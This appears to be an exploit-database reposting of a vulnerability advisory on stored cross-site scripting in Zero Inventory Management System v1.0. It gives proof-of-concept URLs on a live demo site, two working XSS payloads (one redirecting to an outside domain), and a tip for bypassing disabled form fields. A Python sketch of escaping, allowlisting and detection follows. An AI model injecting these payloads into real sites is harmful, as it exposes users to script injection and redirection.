Zero Inventory Management System v1.0 Stored XSS Injection

CVE: CVE-XXXX-XXXX
Category: CWE-79
Price: $500
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2019-06-10
CPE: cpe:cpe:/a:zero-inventory-management-system:v1.0
CVSS: Not available
EPSS: 0.02192
EPSSP: 0.50148


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019060057

Below is a copy:

Zero Inventory Management System v1.0 Stored XSS Injection
/*!
* ::- Title: Zero Inventory Management System v1.0 Stored XSS Injection
* ::- Author: m0ze
* ::- Date: 2019/06/10
* ::- Software: Zero Inventory Management System v1.0
*/
  
::- Details & Description -::
~ Weak security measures, such as the absence of any filtering of input field data, have been discovered in the Zero Inventory Management System. The current version of this web application is 1.0.

::- Demo Website -::
~ https://codecanyon.net/item/zero-inventory-management-system/23875178
~ Backend: http://zeroinfosys.com/inventory
~ Login & Password: it doesn't matter, pick any credentials on the backend login page

::- Special Note -::
~ The declared features of this item, priced at $50, are: "Highly Security provided" and "Injection protected".

::- PoC Links -::
~ http://zeroinfosys.com/inventory/warehouse_manager
~ http://zeroinfosys.com/inventory/admin
~ http://zeroinfosys.com/inventory/showroom_manager/Categories
~ http://zeroinfosys.com/inventory/showroom_manager/Expense

::- PoC [Stored XSS Injection] -::
~ Go to the demo website http://zeroinfosys.com/inventory and log in with the credentials described above. Then go to any page you want and add new data or edit existing data. There is no input data filtering at all, so use any payload you want.
~ You can also edit the user profile: just delete the disabled attribute from any input field or text area and then save your changes.
~ Example #1: <span onmouseover="alert('m0ze')" style="font-size:88px;color:#ff003b;">m0ze</span>
~ Example #2: <img src="x" onerror="alert('m0ze');window.location='http://defcon.su/';">
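As an added defender-side example (not code from the advisory or from the vendor's product), the Python sketch below shows the two controls this report points at: enforcing on the server which profile fields a user may change, since a client-side disabled attribute is removed in seconds, and HTML-encoding stored values at output time so the two payloads quoted above render as inert text. It also includes a small audit helper for flagging records that were saved while no filtering was in place. The field names and sample rows are assumptions, not taken from the product.

```python
import html
import re

# Constructed sample input: the two payloads quoted in the advisory, as they
# would be submitted into an unfiltered text field.
PAYLOADS = [
    '<span onmouseover="alert(\'m0ze\')" style="font-size:88px;color:#ff003b;">m0ze</span>',
    '<img src="x" onerror="alert(\'m0ze\');window.location=\'http://defcon.su/\';">',
]

# Assumed allowlist: the profile fields the application intends to be editable.
# A field the form renders as disabled must be rejected here, not in the browser.
EDITABLE_PROFILE_FIELDS = frozenset({"display_name", "phone"})


def apply_profile_update(stored: dict, submitted: dict) -> dict:
    """Return the updated record, silently dropping every submitted field that
    is not on the server-side allowlist (removing 'disabled' changes nothing)."""
    updated = dict(stored)
    for field, value in submitted.items():
        if field in EDITABLE_PROFILE_FIELDS:
            updated[field] = value
    return updated


def render_cell(value: str) -> str:
    """HTML-encode a stored value at output time; markup inside it is shown as
    literal text instead of being parsed, which neutralises both payloads."""
    return html.escape(value, quote=True)


# Matches a tag carrying an on* event-handler attribute, or a <script> tag.
_ACTIVE_MARKUP = re.compile(r"<\s*[a-z][^>]*\son[a-z]+\s*=|<\s*script\b", re.IGNORECASE)


def find_suspicious_records(rows):
    """Audit helper: return (row_id, field) pairs whose stored text contains
    event-handler attributes or script tags. Intended for reviewing data that was
    written while the application accepted arbitrary input."""
    hits = []
    for row_id, row in rows:
        for field, value in row.items():
            if isinstance(value, str) and _ACTIVE_MARKUP.search(value):
                hits.append((row_id, field))
    return hits
```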

Copyright ©2024 Exploitalert.
